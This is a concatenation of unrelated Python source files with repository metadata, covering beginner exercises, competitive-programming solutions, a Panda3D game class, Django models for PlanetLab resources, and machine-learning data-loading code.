f30e390e9256b93999d1c3a66ed1a5ae6ada94e0 | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/demo_20201106173944.py | 6d65b718ae355669c834ddbbe48686434fa086b7 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | # a = 1
# if a==0:
# print("a=0")
# else:
# print("a!0")
# """
# x>1 (3x-5)
# -1<=x<=1 (x+2)
# x < -1 (5x+3)
# """
# x = int(input("Enter your number:"))
# if x > 1:
# print(3*x-5)
# else:
# if x >= -1:
# print(x + 2)
# else:
# print(5*x+3)
# Guess-the-number game
# import random
# computer_num = random.randint(1,100)
# while True:
#     people_num = int(input("Please enter your number:"))
#     if people_num < computer_num:
#         print("Higher")
#     elif people_num > computer_num:
#         print("Lower")
#     else:
#         print("You got it")
# break
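
# A runnable, cleaned-up version of the commented-out guessing game above
# (added for illustration; wrapped in a function so it does not run on import):
def guess_number_game():
    import random
    computer_num = random.randint(1, 100)
    while True:
        people_num = int(input("Please enter your number: "))
        if people_num < computer_num:
            print("Higher")
        elif people_num > computer_num:
            print("Lower")
        else:
            print("You got it")
            break
# guess_number_game()  # uncomment to play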
# def fun1(a,b,c):
# print("这是参数a:",a)
# print("这是参数b:",b)
# print("这是参数c:",c)
# fun1(1,23,4)
# def fun1(a):
# # return "ac"
# print("a")
# fun1("c")
# def fun1(a,b,c,d):
# print(a,b,c,d)
# fun1(10,13,d=13,c=90)
# fun1 = lambda x: x+10
# print(fun1(5))
# def fun1(x):
# return x+10
# print(fun1(5))
# fun1 = lambda x,y: x+y
# print(fun1(10,12))
# list = ["ha"]
# b = {"hah"}
# c = "a"
# d = ("a","v")
# print(type(list))
# print(type(b))
# print(type(c))
# print(type(d))
lista = ["a","b","c"]
# lista.append("b")
# lista.insert(5,"e")
# lista.remove("b")
lista.pop(0)
print(lista) | [
"[email protected]"
] | |
cec74534f2de9765f471aa6aae72fcbe7d53e3ac | 0085acce00bbd20658f312f30575632b6272090d | /leetcode_python2/lc917_reverse_only_letters.py | edd5790198b06f867191c4684a3f882a2b368ac8 | [] | no_license | garderobin/Leetcode | 52fce8279e4963bc7824a19aae903ca6aad83867 | ea10ce7fe465431399e444c6ecb0b7560b17e1e4 | refs/heads/master | 2021-01-17T14:43:49.423071 | 2018-11-12T00:55:47 | 2018-11-12T00:55:47 | 51,183,667 | 0 | 1 | null | 2018-11-12T00:55:48 | 2016-02-06T01:00:36 | Java | UTF-8 | Python | false | false | 580 | py | from abc import ABCMeta, abstractmethod
class ReverseOnlyLetters:
__metaclass__ = ABCMeta
@abstractmethod
def reverse_only_letters(self, S):
"""
:type S: str
:rtype: str
"""
class ReverseOnlyLettersImpl1(ReverseOnlyLetters):
"""
Time: O(n)
Space: O(n)
"""
def reverse_only_letters(self, S):
letters, rs = [c for c in S if c.isalpha()], []
for c in S:
if c.isalpha():
rs.append(letters.pop())
else:
rs.append(c)
return ''.join(rs)
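
# Hedged quick check (added for illustration):
if __name__ == "__main__":
    solver = ReverseOnlyLettersImpl1()
    assert solver.reverse_only_letters("ab-cd") == "dc-ba"
    assert solver.reverse_only_letters("a-bC-dEf-ghIj") == "j-Ih-gfE-dCba"
    print("ReverseOnlyLettersImpl1 passed the sample cases")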
| [
"[email protected]"
] | |
2ab64215e6c7985e26ab397ec6fe152920e75e0f | 01b6a10e92f3dae773f824065a5508b073fd6d62 | /baekjoon/1837.py | 8a5748cf6fa39529be2da4aa74086b2030da1c75 | [] | no_license | jihongeek/Algo | 213989dc86b5476939776c31b12b21fba48bff8d | 8dfc9db33f611ff76c4943be9868847c3c0501b4 | refs/heads/master | 2023-08-28T23:32:42.448354 | 2023-08-12T11:26:08 | 2023-08-12T11:26:08 | 188,658,216 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | from sys import stdin
p,k = map(int,stdin.readline().split())  # .split() was missing, so the two integers could not be unpacked from the raw line
for i in range() | [
"[email protected]"
] | |
b8466fc6eb726ee2342e5e499d2da3d64d0cb182 | 76938f270e6165514162856b2ed33c78e3c3bcb5 | /lib/coginvasion/battle/TurretGag.py | f6649cdc3a30755cf243d311c6153058e48d7e42 | [] | no_license | coginvasion/src | 9a5ec682845cc4c9c013fcc35e9b379bd4360b6c | 2d7fcdb0cd073050250cb51292ee48300a9fe19f | refs/heads/master | 2021-01-19T06:50:11.786112 | 2015-11-08T12:28:52 | 2015-11-08T12:28:52 | 61,545,543 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,296 | py | # Embedded file name: lib.coginvasion.battle.TurretGag
"""
Filename: TurretGag.py
Created by: DecodedLogic (10Aug15)
"""
from panda3d.core import CollisionSphere, CollisionNode, BitMask32, CollisionHandlerEvent, NodePath
from direct.showbase.DirectObject import DirectObject
from direct.interval.ProjectileInterval import ProjectileInterval
from direct.actor.Actor import Actor
from lib.coginvasion.globals import CIGlobals
from lib.coginvasion.gags.GagManager import GagManager
class TurretGag(DirectObject):
def __init__(self, turret, collideEventName, gagName):
DirectObject.__init__(self)
self.turret = turret
self.collideEventName = collideEventName
self.eventName = 'turretGagSensor' + str(id(self)) + '-into'
self.trackName = 'turretGagTrack' + str(id(self))
self.track = None
self.gravityMult = 0.9
self.duration = 2.5
self.setClass(gagName)
return
def setClass(self, gagName):
gagMgr = GagManager()
self.gagClass = gagMgr.getGagByName(gagName)
self.gag = None
return
def build(self):
self.gagClass.build()
self.gag = self.gagClass.getGag()
self.gag.reparentTo(self.turret.getCannon())
self.gag.setY(5.2)
self.gag.setHpr(90, -90, 90)
if isinstance(self.gag, Actor):
self.gag.loop('chan')
def shoot(self, rangeVector):
if not self.gag:
return
rangeNode = NodePath('Shoot Range')
rangeNode.reparentTo(self.turret.getCannon())
rangeNode.setScale(render, 1)
rangeNode.setPos(rangeVector)
rangeNode.setHpr(90, -90, 90)
self.gag.setScale(self.gag.getScale(render))
self.gag.setScale(self.gag.getScale(render))
self.gag.setPos(self.gag.getPos(render))
self.gag.reparentTo(render)
self.gag.setHpr(rangeNode.getHpr(render))
base.audio3d.attachSoundToObject(self.gagClass.woosh, self.gag)
self.gagClass.woosh.play()
self.track = ProjectileInterval(self.gag, startPos=self.gag.getPos(render), endPos=rangeNode.getPos(render), gravityMult=self.gravityMult, duration=self.duration, name=self.trackName)
self.track.setDoneEvent(self.track.getName())
self.acceptOnce(self.track.getDoneEvent(), self.cleanup)
self.track.start()
fireSfx = base.audio3d.loadSfx('phase_4/audio/sfx/MG_cannon_fire_alt.mp3')
base.audio3d.attachSoundToObject(fireSfx, self.turret.getCannon())
fireSfx.play()
if self.turret.isLocal():
self.buildCollisions()
self.acceptOnce(self.eventName, self.handleCollision)
def getGag(self):
return self.gag
def buildCollisions(self):
pieSphere = CollisionSphere(0, 0, 0, 1)
pieSensor = CollisionNode('turretGagSensor' + str(id(self)))
pieSensor.addSolid(pieSphere)
pieNP = self.gag.attachNewNode(pieSensor)
pieNP.setCollideMask(BitMask32(0))
pieNP.node().setFromCollideMask(CIGlobals.WallBitmask | CIGlobals.FloorBitmask)
event = CollisionHandlerEvent()
event.set_in_pattern('%fn-into')
event.set_out_pattern('%fn-out')
base.cTrav.addCollider(pieNP, event)
def handleCollision(self, entry):
messenger.send(self.collideEventName, [entry, self])
def getID(self):
return self.gagClass.getID()
def getCollideEventName(self):
return self.collideEventName
def cleanup(self):
if hasattr(self, 'collideEventName'):
del self.collideEventName
if self.track:
self.track.finish()
self.track = None
if self.turret:
if self.turret.entities and self in self.turret.entities:
self.turret.entities.remove(self)
self.turret = None
self.ignore(self.eventName)
self.duration = None
self.gravityMult = None
self.eventName = None
self.trackName = None
if self.gagClass:
self.gagClass.cleanupGag()
self.gagClass = None
if self.gag:
if isinstance(self.gag, Actor):
self.gag.cleanup()
self.gag.removeNode()
self.gag = None
return | [
"[email protected]"
] | |
23abc26505d01fa5cea8932a4626c30f652939e6 | de6fb3a55196b6bd36a4fda0e08ad658679fb7a1 | /expedient/src/python/expedient/clearinghouse/geni/planetlab/sfa-models.py | 0b196d17769a39223a7fdf4a5aa52bdb1bd29381 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | dana-i2cat/felix | 4a87af639e4c7db686bfa03f1ae4ce62711615e3 | 059ed2b3308bda2af5e1942dc9967e6573dd6a53 | refs/heads/master | 2021-01-02T23:12:43.840754 | 2016-02-04T10:04:24 | 2016-02-04T10:04:24 | 17,132,912 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 16,040 | py | '''
Created on Jul 4, 2010
@author: jnaous
'''
from django.db import models
from expedient.clearinghouse.resources.models import Resource, Sliver
from expedient.clearinghouse.geni.models import GENIAggregate, GENISliceInfo
from xml.etree import cElementTree as et
import calendar
from exceptions import RSpecParsingException, NameConflictException
import logging
logger = logging.getLogger("PlanetLabModels")
def get_start_duration(start_time=None, end_time=None):
"""
Get the start_time and duration in POSIX seconds from the epoch.
@keyword start_time: Optional. A start time for the whole network.
Default = None.
@type start_time: C{datetime.datetime} instance
@keyword end_time: Optional. An end time for the whole network.
Default = None.
@type end_time: C{datetime.datetime} instance
@return: a tuple (start_time, duration)
@rtype: (int or None, int or None)
"""
if start_time:
start_time_sec = calendar.timegm(start_time.timetuple())
if end_time:
duration = end_time - start_time
duration = duration.total_seconds()
else:
duration = None
else:
start_time_sec = None
duration = None
return (start_time_sec, duration)
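
# Hedged usage sketch (added for illustration):
#     >>> from datetime import datetime, timedelta
#     >>> start = datetime(2010, 7, 4, 12, 0, 0)
#     >>> get_start_duration(start, start + timedelta(hours=2))
#     (1278244800, 7200.0)
# i.e. a POSIX start timestamp (treating the naive datetime as UTC) plus the duration in seconds.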
class PlanetLabSliceInfo(GENISliceInfo):
"""
Subclasses L{GENIAggregateSliceInfo} to specify additional attributes
for PlanetLab RSpecs
"""
start_time = models.DateTimeField(blank=True, null=True)
end_time = models.DateTimeField(blank=True, null=True)
class PlanetLabNetwork(Resource):
"""
PlanetLab NetSpec.
"""
def __unicode__(self):
return u"PlanetLabNetwork %s" % self.name
@classmethod
def get_from_elem(cls, pl_aggregate, network_elem):
"""
Create or update the NetSpec in the DB from the Element C{network_elem}
that is found in an RSpec. If the same name is in another aggregate,
a L{NameConflictException} is raised.
@param pl_aggregate: The PlanetLabAggregate to which this network
belongs.
@type pl_aggregate: L{PlanetLabAggregate}
@param network_elem: a NetSpec element from an RSpec.
@type network_elem: C{xml.etree.ElementTree.Element}
"""
name = network_elem.get("name")
if not name:
raise RSpecParsingException("Could not find NetSpec name.")
try:
net = cls.objects.get(name=name)
except cls.DoesNotExist:
net = cls.objects.create(
name=name, aggregate=pl_aggregate)
if net.aggregate.pk != pl_aggregate.pk:
raise NameConflictException(
"Network %s is in a different aggregate." % name)
if net.available == False:
net.available = True
net.update_timestamp()
net.save()
# Update the nodes in the network
current_node_pks = set(
net.nodes.filter(available=True).values_list("pk", flat=True))
new_node_pks = set()
node_elems = network_elem.findall(".//NodeSpec")
for node_elem in node_elems:
node = PlanetLabNode.get_from_elem(net, node_elem)
new_node_pks.add(node.pk)
logger.debug("Added %s." % node)
# set available to False for old nodes
old_node_pks = current_node_pks - new_node_pks
for pk in old_node_pks:
node = PlanetLabNode.objects.get(pk=pk)
node.available = False
node.update_timestamp()
node.save()
logger.debug("Set %s to unavailable." % node)
return net
def get_as_elem(self, slice=None):
"""
Get the PlanetLabNetwork as ElementTree element so it can be added
to the RSpec and dumped as XML.
@keyword slice: Optional. Slice for which we are producing this RSpec.
Specifying the slice will set the <sliver /> tag for PlanetLab
nodes that are part of the slice.
@type slice: L{expedient.clearinghouse.slice.models.Slice}.
@return: the NetSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
# see if this network has a sliver in the slice.
netspec = et.Element("NetSpec", dict(
name=self.name,
))
if slice:
try:
sliver = slice.sliver_set.get(resource__pk=self.pk)
net_sliver = sliver.as_leaf_class()
stime, duration = get_start_duration(
net_sliver.start_time, net_sliver.end_time)
netspec["start_time"] = "%s" % stime
netspec["duration"] = "%s" % duration
except Sliver.DoesNotExist:
pass
for rsc_type in ["node"]: #, "link"]:
# Do all the DB ops in one go to be efficient. If we do this for
# each node, then we can get really slow.
if slice:
# Get the IDs of all the planetlab nodes that are in the slice
filter_key = "planetlab%s__network" % rsc_type
rsc_ids = slice.resource_set.filter(
**{filter_key: self}).values_list("pk", flat=True)
# get the wanted sliver info as tuples
sliver_info_tuples = slice.sliver_set.filter(
resource__pk__in=rsc_ids,
).values_list("resource_id", "start_time", "end_time")
# now make the resource ids dictionary keys
sliver_info = {}
for t in sliver_info_tuples:
sliver_info[t[0]] = t[1:]
else:
rsc_ids = []
sliver_info = {}
rsc_set_elem = et.SubElement(netspec, "%ss" % rsc_type)
for rsc in getattr(self, "%ss" % rsc_type).all():
rsc_elem = rsc.get_as_elem()
if rsc.pk in rsc_ids:
# Add sliver tag
et.SubElement(rsc_elem, "sliver")
# add start/duration
stime, duration = get_start_duration(
*sliver_info_tuples[rsc.pk])
rsc_elem["start_time"] = "%s" % stime
rsc_elem["duration"] = "%s" % duration
rsc_set_elem.append(rsc_elem)
return netspec
#class PlanetLabLink(Resource):
# """
# A PlanetLab Rspec LinkSpec.
# """
# type = models.CharField(max_length=60)
# init_params = models.TextField(default="")
# bw = models.IntegerField("Bandwidth")
# min_alloc = models.IntegerField("Minimum allocation")
# max_alloc = models.IntegerField("Maximum allocation")
# network = models.ForeignKey(PlanetLabNetwork, related_name="links")
#
# def get_as_elem(self):
# """
# Return the link as an ElementTree element.
#
# @return: the LinkSpec element
# @rtype: C{xml.etree.ElementTree.Element}
# """
# return et.Element("LinkSpec", dict(
# name = self.name,
# type = self.type,
# init_params = self.init_params,
# bw = self.bw,
# min_alloc = self.min_alloc,
# max_alloc = self.max_alloc,
# ))
class PlanetLabNode(Resource):
'''
A PlanetLab node.
'''
type = models.CharField(max_length=60)
init_params = models.TextField(default="")
cpu_min = models.IntegerField()
cpu_share = models.IntegerField()
cpu_pct = models.IntegerField()
disk_max = models.IntegerField()
network = models.ForeignKey(PlanetLabNetwork, related_name="nodes")
def __unicode__(self):
return u"PlanetLabNode %s" % self.name
@classmethod
def get_from_elem(cls, network, node_elem):
"""
Create or update the planetlab node in the DB from the Element
C{node_elem} that is found in an RSpec. If the same name is in another
aggregate, a L{NameConflictException} is raised.
@param network: The PlanetLabNetwork to which this node belongs.
@type network: L{PlanetLabNetwork}
@param node_elem: a NodeSpec element from an RSpec.
@type node_elem: C{xml.etree.ElementTree.Element}
"""
name = node_elem.get("name")
if not name:
raise RSpecParsingException("Could not find NodeSpec name.")
try:
node = cls.objects.get(name=name)
if node.aggregate.pk != network.aggregate.pk:
raise NameConflictException(
"Node %s is in a different aggregate." % name)
if not node.available:
node.available = True
node.update_timestamp()
except cls.DoesNotExist:
node = cls(name=name, aggregate=network.aggregate, available=True)
for attr in ["type", "init_params"]:
setattr(node, attr, node_elem.get(attr, ""))
for attr in ["cpu_min", "cpu_share", "cpu_pct", "disk_max"]:
setattr(node, attr, node_elem.get(attr, 0))
node.network = network
node.save()
# Update the ifaces on the node
current_iface_pks = set(
node.interfaces.filter(available=True).values_list("pk", flat=True))
new_iface_pks = set()
iface_elems = node_elem.findall(".//IfaceSpec")
for iface_elem in iface_elems:
iface = PlanetLabInterface.get_from_elem(node, iface_elem)
new_iface_pks.add(iface.pk)
logger.debug("Added %s" % iface)
# set available to False for old interfaces
old_iface_pks = current_iface_pks - new_iface_pks
for pk in old_iface_pks:
iface = PlanetLabInterface.objects.get(pk=pk)
iface.available = False
iface.save()
logger.debug("Set %s to unavailable" % iface)
return node
def get_as_elem(self):
"""
Return the node as an ElementTree element.
@return: the NodeSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
node_elem = et.Element("NodeSpec", dict(
name = self.name,
type = self.type,
init_params = self.init_params,
cpu_min = self.cpu_min,
cpu_share = self.cpu_share,
cpu_pct = self.cpu_pct,
disk_max = self.disk_max,
))
net_if = et.SubElement(node_elem, "net_if")
        for iface in self.interfaces.all():  # the ForeignKey declares related_name="interfaces", so the default *_set accessor does not exist
net_if.append(iface.get_as_elem())
return node_elem
class PlanetLabInterface(models.Model):
'''
A PlanetLab Interface (IfSpec)
'''
name = models.CharField(max_length=200)
addr = models.CharField("Address", max_length=200)
type = models.CharField(max_length=60)
init_params = models.TextField(default="")
min_rate = models.IntegerField("Minimum Throughput")
max_rate = models.IntegerField("Maximum Throughput")
max_kbyte = models.IntegerField()
ip_spoof = models.BooleanField("Spoof IP Address?")
available = models.BooleanField(default=True)
# link = models.ForeignKey(PlanetLabLink, related_name="endpoints")
node = models.ForeignKey(PlanetLabNode, related_name="interfaces")
def __unicode__(self):
return u"PlanetLabInterface %s" % self.name
@classmethod
def get_from_elem(cls, node, iface_elem):
"""
Create or update the planetlab interface in the DB from the Element
C{iface_elem} that is found in an RSpec.
@param node: The PlanetLabNode to which this interface belongs.
@type network: L{PlanetLabNode}
@param iface_elem: a IfaceSpec element from an RSpec.
@type iface_elem: C{xml.etree.ElementTree.Element}
"""
name = iface_elem.get("name")
if not name:
raise RSpecParsingException("Could not find IfaceSpec name.")
try:
iface = cls.objects.get(name=name, node=node)
except cls.DoesNotExist:
iface = cls(name=name, node=node)
for attr in ["addr", "type", "init_params"]:
setattr(iface, attr, iface_elem.get(attr, ""))
for attr in ["min_rate", "max_rate", "max_kbyte"]:
setattr(iface, attr, iface_elem.get(attr, 0))
for attr in ["ip_spoof"]:
setattr(iface, attr, iface_elem.get(attr, False))
iface.available = True
iface.save()
return iface
def get_as_elem(self):
"""
Return the interface as an ElementTree element.
@return: the IfSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
return et.Element("IfSpec", dict(
name = self.name,
addr = self.addr,
type = self.type,
init_params = self.init_params,
min_rate = self.min_rate,
max_rate = self.max_rate,
max_kbyte = self.max_kbyte,
ip_spoof = self.ip_spoof,
))
#class PlanetLabLinkSliver(Sliver):
# start_time = models.DateTimeField()
# end_time = models.DateTimeField()
class PlanetLabNodeSliver(Sliver):
start_time = models.DateTimeField()
end_time = models.DateTimeField()
class PlanetLabNetworkSliver(Sliver):
start_time = models.DateTimeField()
end_time = models.DateTimeField()
class PlanetLabAggregate(GENIAggregate):
information = \
"""
A PlanetLab Aggregate exposed through the GENI API.
"""
class Meta:
verbose_name = "PlanetLab GENI-API Aggregate"
def __unicode__(self):
return u"PlanetLab GENI-API Aggregate at %s" % self.url
def _to_rspec(self, slice):
"""
See L{GENIAggregate._to_rspec}.
"""
info = slice.planetlabsliceinfo
stime, duration = get_start_duration(info.start_time, info.end_time)
rspec = et.Element("RSpec", dict(
start_time="%s" % stime,
duration = "%s" % duration,
))
for net in PlanetLabNetwork.objects.filter(aggregate__pk=self):
rspec.append(net.get_as_elem(slice))
return rspec
def _list_resources(self):
"""
See L{GENIAggregate._list_resources}.
"""
rspec = self.proxy.ListResources(
[self.get_am_cred()],
{"geni_compressed": False, "geni_available": True})
logger.debug("Got rspec:\n%s" % rspec)
root = et.fromstring(rspec)
current_net_pks = set(
PlanetLabNetwork.objects.filter(
available=True, aggregate__pk=self.pk).values_list(
"pk", flat=True))
logger.debug("Current_net_pks: %s" % current_net_pks)
new_net_pks = set()
network_elems = root.findall(".//NetSpec")
for network_elem in network_elems:
network = PlanetLabNetwork.get_from_elem(self, network_elem)
new_net_pks.add(network.pk)
logger.debug("Added %s" % network)
# set available to False for old networks
old_net_pks = current_net_pks - new_net_pks
for pk in old_net_pks:
net = PlanetLabNetwork.objects.get(pk=pk)
net.available = False
net.save()
logger.debug("Set %s to unavailable." % network)
def add_to_slice(self, slice, next):
"""
Create a PlanetLabSliceInfo instance for this slice if none exists.
"""
info, created = PlanetLabSliceInfo.objects.get_or_create(slice=slice)
slice.aggregate.add(self)
return next
| [
"[email protected]"
] | |
96e2fee44e3bc7e5c5602c9a487d8a04b807a7a8 | c67f2d0677f8870bc1d970891bbe31345ea55ce2 | /zippy/benchmarks/src/micro/function-call2.py | 48b9f47030ccbdc325c255fd7103349718f10ba7 | [
"BSD-3-Clause"
] | permissive | securesystemslab/zippy | a5a1ecf5c688504d8d16128ce901406ffd6f32c2 | ff0e84ac99442c2c55fe1d285332cfd4e185e089 | refs/heads/master | 2022-07-05T23:45:36.330407 | 2018-07-10T22:17:32 | 2018-07-10T22:17:32 | 67,824,983 | 324 | 27 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # zwei 10/10/13
# function calls
import time
def emptyFunction(arg):
return arg
def callFunctions(num):
count = 0
for i in xrange(num):
ret = emptyFunction(i)
count += 1
return count
def measure():
print("Start timing...")
start = time.time()
sum = callFunctions(1000000000) #1000000
print("Number of calls ", sum)
duration = "%.3f\n" % (time.time() - start)
print("function-call: " + duration)
#warm up
for run in xrange(10000):
callFunctions(50000)
measure() | [
"[email protected]"
] | |
c09bdad7664c65fe8d8e3cb86ec8865551e304a9 | 1c6e5c808c1a3e6242e40b15ae711574e670c3b6 | /food_management/constants/enums.py | 82bfebbb5237fed3541c3c18fdce86151e5b05c3 | [] | no_license | KatakamVedaVandhana/smart_food_management-vandhana | dbe195994c110471d0ae7a5a53adef1441e86466 | 19e410a2aa792b22889a2dfed599312ba6b5a7ad | refs/heads/master | 2023-07-09T05:43:17.491313 | 2020-06-15T06:44:00 | 2020-06-15T06:44:00 | 269,609,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import enum
from ib_common.constants import BaseEnumClass
class CodeLanguage(BaseEnumClass, enum.Enum):
python = "PYTHON"
c_language = "C"
c_plus_plus = "CPP"
python36 = "PYTHON36"
python37 = "PYTHON37"
python38 = "PYTHON38"
python38_datascience = "PYTHON38_DATASCIENCE"
python38_aiml = "PYTHON38_AIML"
class CategoryType(BaseEnumClass, enum.Enum):
indian_bread = "Indian-Bread"
curry = "Curry"
rice = "Rice"
class UnitType(BaseEnumClass, enum.Enum):
pieces = "pieces"
cups = "cups"
laddles = "laddles"
class TypeOfMeal(BaseEnumClass, enum.Enum):
breakfast = "Breakfast"
lunch = "Lunch"
dinner = "Dinner"
class CourseType(BaseEnumClass, enum.Enum):
half_meal = 'Half-meal'
full_meal = 'Full-meal'
custom_meal = 'Custom-meal'
skip_meal = 'Skip-meal'
class RatingType(BaseEnumClass, enum.Enum):
one = 1
two = 2
three = 3
four = 4
five = 5
class BaseUnitType(BaseEnumClass, enum.Enum):
pieces = 'pieces'
kilogram = 'kg'
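
# Hedged usage sketch (added for illustration): these behave like ordinary Python enums,
# so callers typically read .value, e.g.
#     CourseType.full_meal.value          -> 'Full-meal'
#     [meal.value for meal in TypeOfMeal] -> ['Breakfast', 'Lunch', 'Dinner']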
| [
"[email protected]"
] | |
b16fadb21431c33e8e177f4b007b85063c3e167a | 9f52ac141023dcddb4fbe88b881feaca5be6328f | /ros/build/styx_msgs/catkin_generated/pkg.develspace.context.pc.py | 18610254de217a4132dbf9fb576247ad636a13ec | [
"MIT"
] | permissive | uniquetrij/CarND-T3-P4-Capstone | 9b6613339eb33421112130e7b37f46aaaa88a298 | 82f85af8c5554b51afca3c282f6230d3733a376a | refs/heads/master | 2020-03-18T11:53:58.175809 | 2018-06-08T05:54:29 | 2018-06-08T05:54:29 | 134,696,861 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include".split(';') if "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "styx_msgs"
PROJECT_SPACE_DIR = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
| [
"[email protected]"
] | |
1300873c8a24b12df81df6006a135fe297dab299 | 7095bd6c7df3e36beeaf6f2fff321c1994778817 | /try_django/src/blog/migrations/0003_auto_20190609_1303.py | 8b419d2c612ca7e259bd41fb33966cc36ccff5fd | [] | no_license | bajpaiNikhil/dev-blog | 4c6f0b5d6a96cc2552acd91b44e3fe74629bdaed | b2a3823931520292cabaeba94bd8161265f143b0 | refs/heads/master | 2020-06-02T08:39:12.043844 | 2019-07-04T03:25:37 | 2019-07-04T03:25:37 | 191,102,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # Generated by Django 2.2 on 2019-06-09 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_blogpost_slug'),
]
operations = [
migrations.AlterField(
model_name='blogpost',
name='slug',
field=models.SlugField(default='my-slug', unique=True),
),
]
| [
"[email protected]"
] | |
3d325135422a83e7942d4164fb53d194a67e4d51 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /AtCoder_Virtual_Contest/20181228-AtCoder Run/abc060/a.py | e46e119bb58a491f4e1804883c6cc27488c5b02f | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 224 | py | # -*- coding: utf-8 -*-
def main():
a, b, c = map(str, input().split())
if a[-1] == b[0] and b[-1] == c[0]:
print('YES')
else:
print('NO')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
27595488cbfbd204c5edd5aa32464d6815764993 | 4e67c2edd71493a98a3f13e5b2073c1d05b1b656 | /Semestre 01/LogicaProgramacao/Aula 04.08.2020/Decrescente.py | eb1b31d2b5274617cd7fd88602938f3541556159 | [] | no_license | felipellima83/UniCEUB | 05991d7a02b13cd4e236f3be3a34726af2dc1504 | dbc44866545b5247d1b5f76ec6e9b7778e54093e | refs/heads/master | 2023-07-08T19:04:19.830473 | 2021-08-12T12:33:49 | 2021-08-12T12:33:49 | 249,958,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | #Professor: Antônio Barbosa Junior
#Course: Programming Logic
#Student: Felipe Ferreira Lima e Lima
#Student ID: 22001310
#Date: 08/04/2020
#Exercise 06
soma = 0
i = 0
lista = range(7, -1, -1)
# or lista = [7,6,5,4,3,2,1,0]
for x in lista:
print(x, end=" ") | [
"[email protected]"
] | |
38c43c83964024b74479add7f0bcda934ea9529c | 6aa3c372bd2b058be406955768b3fc2047b580e6 | /modules/datastructures/TrainData_DelphesDomAda.py | fdfbc32b890f974127958ad46519ae415b4a7411 | [] | no_license | mverzett/DeepJet-1 | b1aa1491bba284adfa78208237c48ef37fbe4ab3 | 04efbac1a6e4bef97a7ca1bc64345cc048f7ce20 | refs/heads/master | 2021-03-30T15:35:20.059508 | 2018-02-20T17:28:07 | 2018-02-20T17:28:07 | 120,431,339 | 0 | 0 | null | 2018-02-06T09:25:49 | 2018-02-06T09:25:49 | null | UTF-8 | Python | false | false | 1,988 | py | '''
Created on 21 Feb 2017
@author: jkiesele
'''
from TrainDataDeepJetDelphes import TrainDataDeepJetDelphes, fileTimeOut
class TrainData_DelphesDomAda(TrainDataDeepJetDelphes):
'''
example data structure - basis for further developments
'''
def __init__(self):
'''
Constructor
'''
TrainDataDeepJetDelphes.__init__(self)
self.addBranches(['jet_pt', 'jet_eta']) #consider jet pt and eta
self.addBranches(['track_pt'], 6) #consider the pt of the first 6 tracks
self.addBranches(['track_releta', 'track_sip3D', 'track_sip2D'], 10) #all those for the first 10 tracks
self.registerBranches(['isMC','isTtbar'])
#creates label weights per batch
#due to normalisation, two are sufficient for 3 labels (B, C UDSG)
#self.generatePerBatch=None #[[0.2,5.],[0.2,5.]]
def readFromRootFile(self,filename,TupleMeanStd, weighter):
import numpy
Tuple = self.readTreeFromRootToTuple(filename)
mclabel=Tuple['isMC'].view(numpy.ndarray)
mclabel=mclabel.reshape(mclabel.shape[0],1)
proclabel=Tuple['isTtbar'].view(numpy.ndarray)
proclabel=proclabel.reshape(mclabel.shape[0],1)
weights,x_all,alltruth, notremoves =self.getFlavourClassificationData(filename,TupleMeanStd, weighter)
if self.remove:
#print('remove')
mclabel=mclabel[notremoves > 0]
proclabel=proclabel[notremoves > 0]
domaintruth_datamc=numpy.hstack((mclabel,alltruth))
labeltruth=domaintruth_datamc
#domaintruth_ttbarqcd=numpy.hstack((proclabel,alltruth))
self.w=[weights]
#the label fraction weights are computed on the fly
self.x=[x_all, alltruth]
#the truth
self.y=[labeltruth,domaintruth_datamc]
| [
"[email protected]"
] | |
f3acdac3cec7c99140af2bf68d17ebb3f6c47ebd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03112/s044499237.py | d133af3812b23eda812e0e4e272d7974e8c817c9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # なぜかうまくいかない
import sys, re, os
from collections import deque, defaultdict, Counter
